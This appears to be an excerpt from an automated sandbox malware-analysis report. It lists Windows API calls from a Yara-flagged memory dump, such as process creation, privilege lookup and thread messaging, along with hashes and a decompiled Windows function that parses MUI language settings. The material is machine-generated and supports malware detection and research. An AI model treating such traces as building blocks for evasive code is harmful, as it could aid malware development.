                                                                                                                                                            • String ID: .z`
                                                                                                                                                            • API String ID: 3298025750-1441809116
                                                                                                                                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                            • Instruction ID: a7f4c64d3402db80ecf44790c23229da9f4f0f397fd201f9495130dae2291d10
                                                                                                                                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                            • Instruction Fuzzy Hash: E2E01AB12002086BD714DF59CC45EA777ACEF88750F018555B90857242C630E9108AB0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000C834A
                                                                                                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000C836B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                                            • Opcode ID: 033533eee2d20f3e3014a9d66b18407ffb2aa64f88ff44104604592dff7806f8
                                                                                                                                                            • Instruction ID: 55896e5eef3339d560ee18c175957ebb46eebbc8aaf4840c21e42c9363878f35
                                                                                                                                                            • Opcode Fuzzy Hash: 033533eee2d20f3e3014a9d66b18407ffb2aa64f88ff44104604592dff7806f8
                                                                                                                                                            • Instruction Fuzzy Hash: DC01B131A802287BE721A6949C43FFE766CAB41F55F044119FF04BA2C2EA946A0643F6
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000C834A
                                                                                                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000C836B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                                            • Opcode ID: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                                                                                                                                            • Instruction ID: 400571eb188b069a3cd77d726756b4fc3207f786f2e3f88e27d040fec2a5b5f9
                                                                                                                                                            • Opcode Fuzzy Hash: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                                                                                                                                            • Instruction Fuzzy Hash: FD018431A803287BE721A7949C43FFE776C6B41F55F054119FB04BA1C2EAD46A0647F6
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000DA134
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateInternalProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2186235152-0
                                                                                                                                                            • Opcode ID: 361dda97c99b2950f9200c5d62909d4050bb8900db09959657a8e506155513b7
                                                                                                                                                            • Instruction ID: 5bd3ca050ebd3668068e9881bc57fabd5aeeda2a15c12d55b2df2dd89fcfd696
                                                                                                                                                            • Opcode Fuzzy Hash: 361dda97c99b2950f9200c5d62909d4050bb8900db09959657a8e506155513b7
                                                                                                                                                            • Instruction Fuzzy Hash: 83019DB2204508ABCB54CF99DC81EEB77A9AF8C754F158258BA0DA7241D630E851CBA0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000DA134
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateInternalProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2186235152-0
                                                                                                                                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                            • Instruction ID: c98cab979eb77e38e790087d6a0c57907d947b5711638793280ef385fb71d0fe
                                                                                                                                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                            • Instruction Fuzzy Hash: CF01B2B2210208BFCB54DF89DC80EEB77ADAF8C754F158258FA0DA7241C630E851CBA4
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • RtlAllocateHeap.NTDLL(000D4506,?,000D4C7F,000D4C7F,?,000D4506,?,?,?,?,?,00000000,00000000,?), ref: 000DA05D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                            • Instruction ID: 12972e292a9cf94b2340bd3abf2026681b1ded72058ad8aed042731fb1217b7f
                                                                                                                                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                            • Instruction Fuzzy Hash: BEE012B1200208ABDB14EF99CC81EA777ACEF88650F158559BA086B242C630F9108AB0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,000CF1A2,000CF1A2,?,00000000,?,?), ref: 000DA200
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3899507212-0
                                                                                                                                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                            • Instruction ID: b88b5f3449ef76474ed70e16daa593dbee14793c2c1e6b527e29a494f600c62d
                                                                                                                                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                            • Instruction Fuzzy Hash: 36E01AB12002086BDB10DF49CC85EE777ADEF89650F018155BA0867242C930E8108BF5
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • SetErrorMode.KERNELBASE(00008003,?,000C8CF4,?), ref: 000CF6CB
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorMode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                                            • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                                                                                                                            • Instruction ID: a70e99cd2a4758341eee90d6c41642549c4ba45ca153b26a6da7bc5c79da3b26
                                                                                                                                                            • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                                                                                                                            • Instruction Fuzzy Hash: E8D05E616903043BE610AAA49C03F6632CD6B44B00F490064FA88963C3D960E4004165
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • RtlAllocateHeap.NTDLL(000D4506,?,000D4C7F,000D4C7F,?,000D4506,?,?,?,?,?,00000000,00000000,?), ref: 000DA05D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, Offset: 000C0000, based on PE: false
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                            • Opcode ID: 03e9093b74d1a94712e318f7cb5a534fa851ef372762b9642eb02261604237ed
                                                                                                                                                            • Instruction ID: bc61fb171daaed7230a0c4fcb745b7bf25d4038922756a3605986174d2b6fa85
                                                                                                                                                            • Opcode Fuzzy Hash: 03e9093b74d1a94712e318f7cb5a534fa851ef372762b9642eb02261604237ed
                                                                                                                                                            • Instruction Fuzzy Hash: 7CC08C717046218AE234EB64D840877B3AAFBC0340320C91BD58646100823244084A60
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Non-executed Functions

                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E021F8788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				short* _v12;
                                                                                                                                                            				void* _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				char _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				char _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				char _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				char _v68;
                                                                                                                                                            				void* _t216;
                                                                                                                                                            				intOrPtr _t231;
                                                                                                                                                            				short* _t235;
                                                                                                                                                            				intOrPtr _t257;
                                                                                                                                                            				short* _t261;
                                                                                                                                                            				intOrPtr _t284;
                                                                                                                                                            				intOrPtr _t288;
                                                                                                                                                            				void* _t314;
                                                                                                                                                            				signed int _t318;
                                                                                                                                                            				short* _t319;
                                                                                                                                                            				intOrPtr _t321;
                                                                                                                                                            				void* _t328;
                                                                                                                                                            				void* _t329;
                                                                                                                                                            				char* _t332;
                                                                                                                                                            				signed int _t333;
                                                                                                                                                            				signed int* _t334;
                                                                                                                                                            				void* _t335;
                                                                                                                                                            				void* _t338;
                                                                                                                                                            				void* _t339;
                                                                                                                                                            
                                                                                                                                                            				_t328 = __edx;
                                                                                                                                                            				_t322 = __ecx;
                                                                                                                                                            				_t318 = 0;
                                                                                                                                                            				_t334 = _a4;
                                                                                                                                                            				_v8 = 0;
                                                                                                                                                            				_v28 = 0;
                                                                                                                                                            				_v48 = 0;
                                                                                                                                                            				_v20 = 0;
                                                                                                                                                            				_v40 = 0;
                                                                                                                                                            				_v32 = 0;
                                                                                                                                                            				_v52 = 0;
                                                                                                                                                            				if(_t334 == 0) {
                                                                                                                                                            					_t329 = 0xc000000d;
                                                                                                                                                            					L49:
                                                                                                                                                            					_t334[0x11] = _v56;
                                                                                                                                                            					 *_t334 =  *_t334 | 0x00000800;
                                                                                                                                                            					_t334[0x12] = _v60;
                                                                                                                                                            					_t334[0x13] = _v28;
                                                                                                                                                            					_t334[0x17] = _v20;
                                                                                                                                                            					_t334[0x16] = _v48;
                                                                                                                                                            					_t334[0x18] = _v40;
                                                                                                                                                            					_t334[0x14] = _v32;
                                                                                                                                                            					_t334[0x15] = _v52;
                                                                                                                                                            					return _t329;
                                                                                                                                                            				}
                                                                                                                                                            				_v56 = 0;
                                                                                                                                                            				if(E021F8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                            					_v56 = 1;
                                                                                                                                                            					if(_v8 != 0) {
                                                                                                                                                            						_t207 = E021DE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                            					}
                                                                                                                                                            					_push(1);
                                                                                                                                                            					_v8 = _t318;
                                                                                                                                                            					E021F718A(_t207);
                                                                                                                                                            					_t335 = _t335 + 4;
                                                                                                                                                            				}
                                                                                                                                                            				_v60 = _v60 | 0xffffffff;
                                                                                                                                                            				if(E021F8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                                                                                            					_t333 =  *_v8;
                                                                                                                                                            					_v60 = _t333;
                                                                                                                                                            					_t314 = E021DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                            					_push(_t333);
                                                                                                                                                            					_v8 = _t318;
                                                                                                                                                            					E021F718A(_t314);
                                                                                                                                                            					_t335 = _t335 + 4;
                                                                                                                                                            				}
                                                                                                                                                            				_t216 = E021F8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                                                                                                            				_t332 = ";";
                                                                                                                                                            				if(_t216 < 0) {
                                                                                                                                                            					L17:
                                                                                                                                                            					if(E021F8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                            						L30:
                                                                                                                                                            						if(E021F8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                                                                                            							L46:
                                                                                                                                                            							_t329 = 0;
                                                                                                                                                            							L47:
                                                                                                                                                            							if(_v8 != _t318) {
                                                                                                                                                            								E021DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                            							}
                                                                                                                                                            							if(_v28 != _t318) {
                                                                                                                                                            								if(_v20 != _t318) {
                                                                                                                                                            									E021DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                            									_v20 = _t318;
                                                                                                                                                            									_v40 = _t318;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							goto L49;
                                                                                                                                                            						}
                                                                                                                                                            						_t231 = _v24;
                                                                                                                                                            						_t322 = _t231 + 4;
                                                                                                                                                            						_push(_t231);
                                                                                                                                                            						_v52 = _t322;
                                                                                                                                                            						E021F718A(_t231);
                                                                                                                                                            						if(_t322 == _t318) {
                                                                                                                                                            							_v32 = _t318;
                                                                                                                                                            						} else {
                                                                                                                                                            							_v32 = E021DE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                            						}
                                                                                                                                                            						if(_v32 == _t318) {
                                                                                                                                                            							_v52 = _t318;
                                                                                                                                                            							L58:
                                                                                                                                                            							_t329 = 0xc0000017;
                                                                                                                                                            							goto L47;
                                                                                                                                                            						} else {
                                                                                                                                                            							E021D2340(_v32, _v8, _v24);
                                                                                                                                                            							_v16 = _v32;
                                                                                                                                                            							_a4 = _t318;
                                                                                                                                                            							_t235 = E021EE679(_v32, _t332);
                                                                                                                                                            							while(1) {
                                                                                                                                                            								_t319 = _t235;
                                                                                                                                                            								if(_t319 == 0) {
                                                                                                                                                            									break;
                                                                                                                                                            								}
                                                                                                                                                            								 *_t319 = 0;
                                                                                                                                                            								_t321 = _t319 + 2;
                                                                                                                                                            								E021DE2A8(_t322,  &_v68, _v16);
                                                                                                                                                            								if(E021F5553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                            									_a4 = _a4 + 1;
                                                                                                                                                            								}
                                                                                                                                                            								_v16 = _t321;
                                                                                                                                                            								_t235 = E021EE679(_t321, _t332);
                                                                                                                                                            								_pop(_t322);
                                                                                                                                                            							}
                                                                                                                                                            							_t236 = _v16;
                                                                                                                                                            							if( *_v16 != _t319) {
                                                                                                                                                            								E021DE2A8(_t322,  &_v68, _t236);
                                                                                                                                                            								if(E021F5553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                            									_a4 = _a4 + 1;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							if(_a4 == 0) {
                                                                                                                                                            								E021DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                                                                                                            								_v52 = _v52 & 0x00000000;
                                                                                                                                                            								_v32 = _v32 & 0x00000000;
                                                                                                                                                            							}
                                                                                                                                                            							if(_v8 != 0) {
                                                                                                                                                            								E021DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                                                                                            							}
                                                                                                                                                            							_v8 = _v8 & 0x00000000;
                                                                                                                                                            							_t318 = 0;
                                                                                                                                                            							goto L46;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					_t257 = _v24;
                                                                                                                                                            					_t322 = _t257 + 4;
                                                                                                                                                            					_push(_t257);
                                                                                                                                                            					_v40 = _t322;
                                                                                                                                                            					E021F718A(_t257);
                                                                                                                                                            					_t338 = _t335 + 4;
                                                                                                                                                            					if(_t322 == _t318) {
                                                                                                                                                            						_v20 = _t318;
                                                                                                                                                            					} else {
                                                                                                                                                            						_v20 = E021DE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                            					}
                                                                                                                                                            					if(_v20 == _t318) {
                                                                                                                                                            						_v40 = _t318;
                                                                                                                                                            						goto L58;
                                                                                                                                                            					} else {
                                                                                                                                                            						E021D2340(_v20, _v8, _v24);
                                                                                                                                                            						_v16 = _v20;
                                                                                                                                                            						_a4 = _t318;
                                                                                                                                                            						_t261 = E021EE679(_v20, _t332);
                                                                                                                                                            						_t335 = _t338 + 0x14;
                                                                                                                                                            						while(1) {
                                                                                                                                                            							_v12 = _t261;
                                                                                                                                                            							if(_t261 == _t318) {
                                                                                                                                                            								break;
                                                                                                                                                            							}
                                                                                                                                                            							_v12 = _v12 + 2;
                                                                                                                                                            							 *_v12 = 0;
                                                                                                                                                            							E021DE2A8(_v12,  &_v68, _v16);
                                                                                                                                                            							if(E021F5553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                            								_a4 = _a4 + 1;
                                                                                                                                                            							}
                                                                                                                                                            							_v16 = _v12;
                                                                                                                                                            							_t261 = E021EE679(_v12, _t332);
                                                                                                                                                            							_pop(_t322);
                                                                                                                                                            						}
                                                                                                                                                            						_t269 = _v16;
                                                                                                                                                            						if( *_v16 != _t318) {
                                                                                                                                                            							E021DE2A8(_t322,  &_v68, _t269);
                                                                                                                                                            							if(E021F5553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                            								_a4 = _a4 + 1;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						if(_a4 == _t318) {
                                                                                                                                                            							E021DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                            							_v40 = _t318;
                                                                                                                                                            							_v20 = _t318;
                                                                                                                                                            						}
                                                                                                                                                            						if(_v8 != _t318) {
                                                                                                                                                            							E021DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                            						}
                                                                                                                                                            						_v8 = _t318;
                                                                                                                                                            						goto L30;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				_t284 = _v24;
                                                                                                                                                            				_t322 = _t284 + 4;
                                                                                                                                                            				_push(_t284);
                                                                                                                                                            				_v48 = _t322;
                                                                                                                                                            				E021F718A(_t284);
                                                                                                                                                            				_t339 = _t335 + 4;
                                                                                                                                                            				if(_t322 == _t318) {
                                                                                                                                                            					_v28 = _t318;
                                                                                                                                                            				} else {
                                                                                                                                                            					_v28 = E021DE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                            				}
                                                                                                                                                            				if(_v28 == _t318) {
                                                                                                                                                            					_v48 = _t318;
                                                                                                                                                            					goto L58;
                                                                                                                                                            				} else {
                                                                                                                                                            					E021D2340(_v28, _v8, _v24);
                                                                                                                                                            					_v16 = _v28;
                                                                                                                                                            					_a4 = _t318;
                                                                                                                                                            					_t288 = E021EE679(_v28, _t332);
                                                                                                                                                            					_t335 = _t339 + 0x14;
                                                                                                                                                            					while(1) {
                                                                                                                                                            						_v12 = _t288;
                                                                                                                                                            						if(_t288 == _t318) {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            						_v12 = _v12 + 2;
                                                                                                                                                            						 *_v12 = 0;
                                                                                                                                                            						E021DE2A8(_v12,  &_v68, _v16);
                                                                                                                                                            						if(E021F5553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                            							_a4 = _a4 + 1;
                                                                                                                                                            						}
                                                                                                                                                            						_v16 = _v12;
                                                                                                                                                            						_t288 = E021EE679(_v12, _t332);
                                                                                                                                                            						_pop(_t322);
                                                                                                                                                            					}
                                                                                                                                                            					_t296 = _v16;
                                                                                                                                                            					if( *_v16 != _t318) {
                                                                                                                                                            						E021DE2A8(_t322,  &_v68, _t296);
                                                                                                                                                            						if(E021F5553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                            							_a4 = _a4 + 1;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					if(_a4 == _t318) {
                                                                                                                                                            						E021DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                                                                                                            						_v48 = _t318;
                                                                                                                                                            						_v28 = _t318;
                                                                                                                                                            					}
                                                                                                                                                            					if(_v8 != _t318) {
                                                                                                                                                            						E021DE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                            					}
                                                                                                                                                            					_v8 = _t318;
                                                                                                                                                            					goto L17;
                                                                                                                                                            				}
                                                                                                                                                            			}





































                                                                                                                                                            0x021f8788
                                                                                                                                                            0x021f8788
                                                                                                                                                            0x021f8791
                                                                                                                                                            0x021f8794
                                                                                                                                                            0x021f8798
                                                                                                                                                            0x021f879b
                                                                                                                                                            0x021f879e
                                                                                                                                                            0x021f87a1
                                                                                                                                                            0x021f87a4
                                                                                                                                                            0x021f87a7
                                                                                                                                                            0x021f87aa
                                                                                                                                                            0x021f87af
                                                                                                                                                            0x02241ad3
                                                                                                                                                            0x021f8b0a
                                                                                                                                                            0x021f8b0d
                                                                                                                                                            0x021f8b13
                                                                                                                                                            0x021f8b19
                                                                                                                                                            0x021f8b1f
                                                                                                                                                            0x021f8b25
                                                                                                                                                            0x021f8b2b
                                                                                                                                                            0x021f8b31
                                                                                                                                                            0x021f8b37
                                                                                                                                                            0x021f8b3d
                                                                                                                                                            0x021f8b46
                                                                                                                                                            0x021f8b46
                                                                                                                                                            0x021f87c6
                                                                                                                                                            0x021f87d0
                                                                                                                                                            0x02241ae0
                                                                                                                                                            0x02241ae6
                                                                                                                                                            0x02241af8
                                                                                                                                                            0x02241af8
                                                                                                                                                            0x02241afd
                                                                                                                                                            0x02241afe
                                                                                                                                                            0x02241b01
                                                                                                                                                            0x02241b06
                                                                                                                                                            0x02241b06
                                                                                                                                                            0x021f87d6
                                                                                                                                                            0x021f87f2
                                                                                                                                                            0x021f87f7
                                                                                                                                                            0x021f8807
                                                                                                                                                            0x021f880a
                                                                                                                                                            0x021f880f
                                                                                                                                                            0x021f8810
                                                                                                                                                            0x021f8813
                                                                                                                                                            0x021f8818
                                                                                                                                                            0x021f8818
                                                                                                                                                            0x021f882c
                                                                                                                                                            0x021f8831
                                                                                                                                                            0x021f8838
                                                                                                                                                            0x021f8908
                                                                                                                                                            0x021f8920
                                                                                                                                                            0x021f89f0
                                                                                                                                                            0x021f8a08
                                                                                                                                                            0x021f8af6
                                                                                                                                                            0x021f8af6
                                                                                                                                                            0x021f8af8
                                                                                                                                                            0x021f8afb
                                                                                                                                                            0x02241beb
                                                                                                                                                            0x02241beb
                                                                                                                                                            0x021f8b04
                                                                                                                                                            0x02241bf8
                                                                                                                                                            0x02241c0e
                                                                                                                                                            0x02241c13
                                                                                                                                                            0x02241c16
                                                                                                                                                            0x02241c16
                                                                                                                                                            0x02241bf8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021f8b04
                                                                                                                                                            0x021f8a0e
                                                                                                                                                            0x021f8a11
                                                                                                                                                            0x021f8a14
                                                                                                                                                            0x021f8a15
                                                                                                                                                            0x021f8a18
                                                                                                                                                            0x021f8a22
                                                                                                                                                            0x021f8b59
                                                                                                                                                            0x021f8a28
                                                                                                                                                            0x021f8a3c
                                                                                                                                                            0x021f8a3c
                                                                                                                                                            0x021f8a42
                                                                                                                                                            0x02241bb0
                                                                                                                                                            0x02241b11
                                                                                                                                                            0x02241b11
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021f8a48
                                                                                                                                                            0x021f8a51
                                                                                                                                                            0x021f8a5b
                                                                                                                                                            0x021f8a5e
                                                                                                                                                            0x021f8a61
                                                                                                                                                            0x021f8a69
                                                                                                                                                            0x021f8a69
                                                                                                                                                            0x021f8a6d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021f8a74
                                                                                                                                                            0x021f8a7c
                                                                                                                                                            0x021f8a7d
                                                                                                                                                            0x021f8a91
                                                                                                                                                            0x021f8a93
                                                                                                                                                            0x021f8a93
                                                                                                                                                            0x021f8a98
                                                                                                                                                            0x021f8a9b
                                                                                                                                                            0x021f8aa1
                                                                                                                                                            0x021f8aa1
                                                                                                                                                            0x021f8aa4
                                                                                                                                                            0x021f8aaa
                                                                                                                                                            0x021f8ab1
                                                                                                                                                            0x021f8ac5
                                                                                                                                                            0x021f8ac7
                                                                                                                                                            0x021f8ac7
                                                                                                                                                            0x021f8ac5
                                                                                                                                                            0x021f8ace
                                                                                                                                                            0x02241bc9
                                                                                                                                                            0x02241bce
                                                                                                                                                            0x02241bd2
                                                                                                                                                            0x02241bd2
                                                                                                                                                            0x021f8ad8
                                                                                                                                                            0x021f8aeb
                                                                                                                                                            0x021f8aeb
                                                                                                                                                            0x021f8af0
                                                                                                                                                            0x021f8af4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021f8af4
                                                                                                                                                            0x021f8a42
                                                                                                                                                            0x021f8926
                                                                                                                                                            0x021f8929
                                                                                                                                                            0x021f892c
                                                                                                                                                            0x021f892d
                                                                                                                                                            0x021f8930
                                                                                                                                                            0x021f8935
                                                                                                                                                            0x021f893a
                                                                                                                                                            0x021f8b51
                                                                                                                                                            0x021f8940
                                                                                                                                                            0x021f8954
                                                                                                                                                            0x021f8954
                                                                                                                                                            0x021f895a
                                                                                                                                                            0x02241b63
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021f8960
                                                                                                                                                            0x021f8969
                                                                                                                                                            0x021f8973
                                                                                                                                                            0x021f8976
                                                                                                                                                            0x021f8979
                                                                                                                                                            0x021f897e
                                                                                                                                                            0x021f8981
                                                                                                                                                            0x021f8981
                                                                                                                                                            0x021f8986
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02241b6e
                                                                                                                                                            0x02241b74
                                                                                                                                                            0x02241b7b
                                                                                                                                                            0x02241b8f
                                                                                                                                                            0x02241b91
                                                                                                                                                            0x02241b91
                                                                                                                                                            0x02241b99
                                                                                                                                                            0x02241b9c
                                                                                                                                                            0x02241ba2
                                                                                                                                                            0x02241ba2
                                                                                                                                                            0x021f898c
                                                                                                                                                            0x021f8992
                                                                                                                                                            0x021f8999
                                                                                                                                                            0x021f89ad
                                                                                                                                                            0x02241ba8
                                                                                                                                                            0x02241ba8
                                                                                                                                                            0x021f89ad
                                                                                                                                                            0x021f89b6
                                                                                                                                                            0x021f89c8
                                                                                                                                                            0x021f89cd
                                                                                                                                                            0x021f89d0
                                                                                                                                                            0x021f89d0
                                                                                                                                                            0x021f89d6
                                                                                                                                                            0x021f89e8
                                                                                                                                                            0x021f89e8
                                                                                                                                                            0x021f89ed
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021f89ed
                                                                                                                                                            0x021f895a
                                                                                                                                                            0x021f883e
                                                                                                                                                            0x021f8841
                                                                                                                                                            0x021f8844
                                                                                                                                                            0x021f8845
                                                                                                                                                            0x021f8848
                                                                                                                                                            0x021f884d
                                                                                                                                                            0x021f8852
                                                                                                                                                            0x021f8b49
                                                                                                                                                            0x021f8858
                                                                                                                                                            0x021f886c
                                                                                                                                                            0x021f886c
                                                                                                                                                            0x021f8872
                                                                                                                                                            0x02241b0e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021f8878
                                                                                                                                                            0x021f8881
